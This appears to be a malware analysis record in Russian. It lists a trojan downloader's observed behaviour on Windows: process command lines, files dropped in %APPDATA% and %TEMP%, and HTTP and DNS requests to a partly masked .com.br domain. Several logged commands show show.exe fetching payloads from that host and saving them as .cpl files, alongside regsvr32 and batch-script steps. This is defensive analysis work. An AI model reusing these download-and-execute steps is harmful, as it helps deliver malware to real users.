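Техническая информация
Ниже идут записи без заголовков разделов: командные строки запускаемых процессов, пути файлов в %APPDATA% и %TEMP%, сетевые обращения (HTTP, порт 80, DNS-запрос) и классы окон (ClassName/WindowName). Заголовки разделов на странице не сохранились, поэтому повторяющиеся пути, вероятно, относятся к разным категориям действий с файлами; имя домена частично скрыто символами ###.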
- '%APPDATA%\show.exe' http://www.sa###.com.br/arquivos/.config/03.sth "%APPDATA%\PrgFile.cpl"
- '%APPDATA%\start.cpl'
- '%APPDATA%\show.exe' http://www.sa###.com.br/arquivos/.config/02.sth "%APPDATA%\cont.cpl"
- '%APPDATA%\begin.exe'
- '%APPDATA%\show.exe' http://www.sa###.com.br/arquivos/.config/01.sth "%APPDATA%\start.cpl"
- '%APPDATA%\start.cpl' (загружен из сети Интернет)
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\windows\NtSysDef.dll"
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\CRNJEUFU\*.dll"
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10 -w 10000
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\windows\*.dll"
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 3 -w 10000
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\begin.bat" "
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\CRNJEUFU\SysPluginv9b.0.2012.0.dll"
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\CRNJEUFU\CRNJEUFUSysPluginv9b.0.2012.0.dll"
- %APPDATA%\start.cpl
- %APPDATA%\cont.cpl
- %APPDATA%\PrgFile.cpl
- %APPDATA%\show.exe
- %APPDATA%\begin.exe
- %TEMP%\1.tmp\begin.bat
- %TEMP%\1.tmp\begin.bat
- %APPDATA%\show.exe
- 'www.sa###.com.br':80
- www.sa###.com.br/arquivos/.config/03.sth
- www.sa###.com.br/arquivos/.config/02.sth
- www.sa###.com.br/arquivos/.config/01.sth
- DNS ASK www.sa###.com.br
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'